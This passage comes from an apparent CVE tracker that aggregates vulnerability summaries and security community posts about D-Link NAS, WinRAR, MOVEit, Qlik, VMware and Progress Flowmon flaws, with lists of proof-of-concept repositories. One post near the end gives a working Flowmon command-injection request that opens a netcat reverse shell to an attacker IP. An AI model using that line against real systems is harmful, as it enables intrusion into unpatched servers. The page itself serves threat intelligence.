  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-3273
(7.3 HIGH)

EPSS: 83.36%

updated 2024-04-07T15:30:32

4 posts

A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public a

Nuclei template

8 repos

https://github.com/LeopoldSkell/CVE-2024-3273

https://github.com/adhikara13/CVE-2024-3273

https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE

https://github.com/ThatNotEasy/CVE-2024-3273

https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273

https://github.com/mrrobot0o/CVE-2024-3273-

https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT

https://github.com/Chocapikk/CVE-2024-3273

screaminggoat at 2024-04-29T14:56:25.225Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

##

screaminggoat@infosec.exchange at 2024-04-29T14:56:25.000Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation

##

obivan at 2024-04-19T07:52:44.982Z ##

CVE-2024-3273 Proof of Concept github.com/adhikara13/CVE-2024

##

obivan@infosec.exchange at 2024-04-19T07:52:44.000Z ##

CVE-2024-3273 Proof of Concept github.com/adhikara13/CVE-2024

##

CVE-2024-1086
(7.8 HIGH)

EPSS: 0.04%

updated 2024-04-06T05:01:36

2 posts

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT. We recommend upgradi

3 repos

https://github.com/CCIEVoice2009/CVE-2024-1086

https://github.com/Notselwyn/CVE-2024-1086

https://github.com/Alicey0719/docker-POC_CVE-2024-1086

CVE-2024-3272
(9.8 CRITICAL)

EPSS: 1.27%

updated 2024-04-05T06:30:47

2 posts

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack

1 repos

https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE

screaminggoat at 2024-04-29T14:56:25.225Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

##

screaminggoat@infosec.exchange at 2024-04-29T14:56:25.000Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation

##

CVE-2023-41265
(9.6 CRITICAL)

EPSS: 87.59%

updated 2024-04-04T07:16:03

2 posts

An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the bac

Nuclei template

1 repos

https://github.com/praetorian-inc/zeroqlik-detect

screaminggoat at 2024-04-26T14:59:18.789Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

##

screaminggoat@infosec.exchange at 2024-04-26T14:59:18.000Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel

##

CVE-2023-38831
(7.8 HIGH)

EPSS: 44.37%

updated 2024-04-04T07:09:58

6 posts

RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to ac

43 repos

https://github.com/SugiB3o/Keylog_CVE2023-38831

https://github.com/r1yaz/winDED

https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc

https://github.com/asepsaepdin/CVE-2023-38831

https://github.com/Malwareman007/CVE-2023-38831

https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT

https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831

https://github.com/MyStuffYT/CVE-2023-38831-POC

https://github.com/xaitax/WinRAR-CVE-2023-38831

https://github.com/malvika-thakur/CVE-2023-38831

https://github.com/elefantesagradodeluzinfinita/cve-2023-38831

https://github.com/nhman-python/CVE-2023-38831

https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit

https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit

https://github.com/b1tg/CVE-2023-38831-winrar-exploit

https://github.com/z3r0sw0rd/CVE-2023-38831-PoC

https://github.com/Mich-ele/CVE-2023-38831-winrar

https://github.com/PascalAsch/CVE-2023-38831-KQL

https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831

https://github.com/GOTonyGO/CVE-2023-38831-winrar

https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar

https://github.com/thegr1ffyn/CVE-2023-38831

https://github.com/an040702/CVE-2023-38831

https://github.com/Garck3h/cve-2023-38831

https://github.com/HDCE-inc/CVE-2023-38831

https://github.com/80r1ng/CVE-2023-38831-EXP

https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC

https://github.com/kehrijksen/CVE-2023-38831

https://github.com/ignis-sec/CVE-2023-38831-RaRCE

https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection

https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc

https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC

https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial

https://github.com/youmulijiang/evil-winrar

https://github.com/IMHarman/CVE-2023-38831

https://github.com/ruycr4ft/CVE-2023-38831

https://github.com/K3rnel-Dev/WinrarExploit

https://github.com/RomainBayle08/CVE-2023-38831

https://github.com/Nielk74/CVE-2023-38831

https://github.com/akhomlyuk/cve-2023-38831

https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE

https://github.com/s4m98/winrar-cve-2023-38831-poc-gen

https://github.com/SpamixOfficial/CVE-2023-38831

oversecurity@mastodon.social at 2024-04-29T16:24:09.000Z ##

CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations

By Cluster25 Threat Intel TeamOctober 12, 2023

🔗️ [Duskrise] link.is.it/a27zga

##

screaminggoat at 2024-04-29T15:11:36.905Z ##

Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.

##

screaminggoat at 2024-04-19T13:16:13.180Z ##

The Computer Emergency Response Team of Ukraine (CERT-UA) reported an attempted cyberattack against a Defense Forces of Ukraine representative. An unidentified threat actor (tracked as UAC-0149) used Signal messenger to send a malicious RAR archive for a job application. This leveraged the vulnerability CVE-2023-38831 (7.8 high, disclosed 23 August 2023 by Group-IB as an exploited zero-day; RARLAB WinRAR Code Execution Vulnerability). CERT-UA explained that the infection chain leads to COOKBOX malware being deployed. IOC provided. 🔗 cert.gov.ua/article/6278620

##

oversecurity@mastodon.social at 2024-04-29T16:24:09.000Z ##

CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations

By Cluster25 Threat Intel TeamOctober 12, 2023

🔗️ [Duskrise] link.is.it/a27zga

##

screaminggoat@infosec.exchange at 2024-04-29T15:11:36.000Z ##

Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.

#cyberespionage #SideCopy #Pakistan #APT #threatintel

##

simontsui@infosec.exchange at 2024-04-19T13:16:13.000Z ##

The Computer Emergency Response Team of Ukraine (CERT-UA) reported an attempted cyberattack against a Defense Forces of Ukraine representative. An unidentified threat actor (tracked as UAC-0149) used Signal messenger to send a malicious RAR archive for a job application. This leveraged the vulnerability CVE-2023-38831 (7.8 high, disclosed 23 August 2023 by Group-IB as an exploited zero-day; RARLAB WinRAR Code Execution Vulnerability). CERT-UA explained that the infection chain leads to COOKBOX malware being deployed. IOC provided. 🔗 cert.gov.ua/article/6278620

#threatintel #cyberespionage #CERTUA #Ukraine #RussiaUkraineWar #IOC #UAC0149 #CVE_2023_38831

##

CVE-2023-32054
(7.3 HIGH)

EPSS: 0.04%

updated 2024-04-04T05:57:40

2 posts

Volume Shadow Copy Elevation of Privilege Vulnerability

screaminggoat at 2024-04-22T13:54:40.550Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

##

simontsui@infosec.exchange at 2024-04-22T13:54:40.000Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

#MagicDot #CVE_2023_42757 #CVE_2023_32054 #CVE_2023_36396

##

CVE-2023-34362
(9.8 CRITICAL)

EPSS: 95.55%

updated 2024-04-04T04:29:06

2 posts

In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an

Nuclei template

9 repos

https://github.com/sfewer-r7/CVE-2023-34362

https://github.com/kenbuckler/MOVEit-CVE-2023-34362

https://github.com/lithuanian-g/cve-2023-34362-iocs

https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs

https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362

https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362

https://github.com/horizon3ai/CVE-2023-34362

https://github.com/errorfiathck/MOVEit-Exploit

https://github.com/Malwareman007/CVE-2023-34362

catc0n at 2024-04-23T18:00:37.652Z ##

For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.

##

catc0n@infosec.exchange at 2024-04-23T18:00:37.000Z ##

For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.

##

CVE-2024-22247
(4.8 MEDIUM)

EPSS: 0.04%

updated 2024-04-02T18:31:17

1 posts

VMware SD-WAN Edge contains a missing authentication and protection mechanism vulnerability. A malicious actor with physical access to the SD-WAN Edge appliance during activation can potentially exploit this vulnerability to access the BIOS configuration. In addition, the malicious actor may be able to exploit the default boot priority configured.

simontsui@infosec.exchange at 2024-04-17T22:42:26.000Z ##

Unexpected late security advisory from VMware, but there are 3 vulnerabilities (no mention of exploitation) in VMware SD-WAN Edge and SD-WAN Orchestrator: 🔗 vmware.com/security/advisories

  • CVE-2024-22246 (7.4 high) Unauthenticated Command Injection vulnerability in SD-WAN Edge
  • CVE-2024-22247 (4.8 medium) Missing Authentication and Protection Mechanism vulnerability in SD-WAN Edge
  • CVE-2024-22248 (7.2 high) Open redirect vulnerability in SD-WAN Orchestrator

#VMware #vulnerability #PatchTuesday #CVE_2024_22246 #CVE_2024_22247 #CVE_2024_22248

##

CVE-2024-22248
(7.1 HIGH)

EPSS: 0.04%

updated 2024-04-02T18:31:17

1 posts

VMware SD-WAN Orchestrator contains an open redirect vulnerability. A malicious actor may be able to redirect a victim to an attacker controlled domain due to improper path handling leading to sensitive information disclosure.

simontsui@infosec.exchange at 2024-04-17T22:42:26.000Z ##

Unexpected late security advisory from VMware, but there are 3 vulnerabilities (no mention of exploitation) in VMware SD-WAN Edge and SD-WAN Orchestrator: 🔗 vmware.com/security/advisories

  • CVE-2024-22246 (7.4 high) Unauthenticated Command Injection vulnerability in SD-WAN Edge
  • CVE-2024-22247 (4.8 medium) Missing Authentication and Protection Mechanism vulnerability in SD-WAN Edge
  • CVE-2024-22248 (7.2 high) Open redirect vulnerability in SD-WAN Orchestrator

#VMware #vulnerability #PatchTuesday #CVE_2024_22246 #CVE_2024_22247 #CVE_2024_22248

##

CVE-2024-22246
(7.4 HIGH)

EPSS: 0.04%

updated 2024-04-02T18:31:16

1 posts

VMware SD-WAN Edge contains an unauthenticated command injection vulnerability potentially leading to remote code execution. A malicious actor with local access to the Edge Router UI during activation may be able to perform a command injection attack that could lead to full control of the router.

simontsui@infosec.exchange at 2024-04-17T22:42:26.000Z ##

Unexpected late security advisory from VMware, but there are 3 vulnerabilities (no mention of exploitation) in VMware SD-WAN Edge and SD-WAN Orchestrator: 🔗 vmware.com/security/advisories

  • CVE-2024-22246 (7.4 high) Unauthenticated Command Injection vulnerability in SD-WAN Edge
  • CVE-2024-22247 (4.8 medium) Missing Authentication and Protection Mechanism vulnerability in SD-WAN Edge
  • CVE-2024-22248 (7.2 high) Open redirect vulnerability in SD-WAN Orchestrator

#VMware #vulnerability #PatchTuesday #CVE_2024_22246 #CVE_2024_22247 #CVE_2024_22248

##

CVE-2024-2389
(10.0 CRITICAL)

EPSS: 0.44%

updated 2024-04-02T15:30:43

17 posts

In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified.  An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.

Nuclei template

25 repos

https://github.com/brijne/CVE-2024-23897-RCE

https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability

https://github.com/viszsec/CVE-2024-23897

https://github.com/binganao/CVE-2024-23897

https://github.com/ThatNotEasy/CVE-2024-23897

https://github.com/h4x0r-dz/CVE-2024-23897

https://github.com/ifconfig-me/CVE-2024-23897

https://github.com/yoryio/CVE-2024-23897

https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897

https://github.com/adhikara13/CVE-2024-2389

https://github.com/CKevens/CVE-2024-23897

https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-

https://github.com/vmtyan/poc-cve-2024-23897

https://github.com/B4CK4TT4CK/CVE-2024-23897

https://github.com/jopraveen/CVE-2024-23897

https://github.com/raheel0x01/CVE-2024-23897

https://github.com/wjlin0/CVE-2024-23897

https://github.com/godylockz/CVE-2024-23897

https://github.com/Nebian/CVE-2024-23897

https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read

https://github.com/xaitax/CVE-2024-23897

https://github.com/kaanatmacaa/CVE-2024-23897

https://github.com/Vozec/CVE-2024-23897

https://github.com/AbraXa5/Jenkins-CVE-2024-23897

https://github.com/Abo5/CVE-2024-23897

DarkWebInformer at 2024-04-26T14:11:38.215Z ##

🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).

github.com/RhinoSecurityLabs/C

X Link: twitter.com/DarkWebInformer/st

##

DarkWebInformer@infosec.exchange at 2024-04-26T14:11:38.000Z ##

🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability

github.com/RhinoSecurityLabs/C

X Link: twitter.com/DarkWebInformer/st

##

DarkWebInformer at 2024-04-26T14:11:38.215Z ##

🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).

github.com/RhinoSecurityLabs/C

X Link: twitter.com/DarkWebInformer/st

##

DarkWebInformer@infosec.exchange at 2024-04-26T14:11:38.000Z ##

🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability

github.com/RhinoSecurityLabs/C

X Link: twitter.com/DarkWebInformer/st

##

screaminggoat at 2024-04-23T15:24:27.352Z ##

Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗rhinosecuritylabs.com/research

Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi

##

screaminggoat at 2024-04-23T15:17:31.370Z ##

@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 support.kemptechnologies.com/h

##

screaminggoat@infosec.exchange at 2024-04-23T15:24:27.000Z ##

Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗rhinosecuritylabs.com/research

Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi

#Progress #Flowmon #vulnerability #CVE_2024_2389

##

screaminggoat@infosec.exchange at 2024-04-23T15:17:31.000Z ##

@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 support.kemptechnologies.com/h

#CVE_2024_2389 #Progress #PatchTuesday #vulnerability

##

ntkramer at 2024-04-26T22:27:35.103Z ##

🥪 & : we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.

(fixed CVE # from a previous post)

viz.greynoise.io/tags/progress

##

jbhall56 at 2024-04-25T12:10:52.922Z ##

The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. bleepingcomputer.com/news/secu

##

jos1264@social.skynetcloud.site at 2024-04-24T12:15:04.000Z ##

PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) helpnetsecurity.com/2024/04/24 #networkmonitoring #RhinoSecurity #vulnerability #enterprise #Don'tmiss #Progress #News #PoC

##

campuscodi@mastodon.social at 2024-04-23T14:30:25.000Z ##

Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: support.kemptechnologies.com/h

Rhino Labs has published a write-up on the bug here: rhinosecuritylabs.com/research

The issue is tracked as CVE-2024-2389.

##

wvu at 2024-04-23T07:25:19.407Z ##

Progress Kemp Flowmon CVE-2024-2389:

curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'

##

ntkramer@infosec.exchange at 2024-04-26T22:27:35.000Z ##

🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.

(fixed CVE # from a previous post)

viz.greynoise.io/tags/progress

##

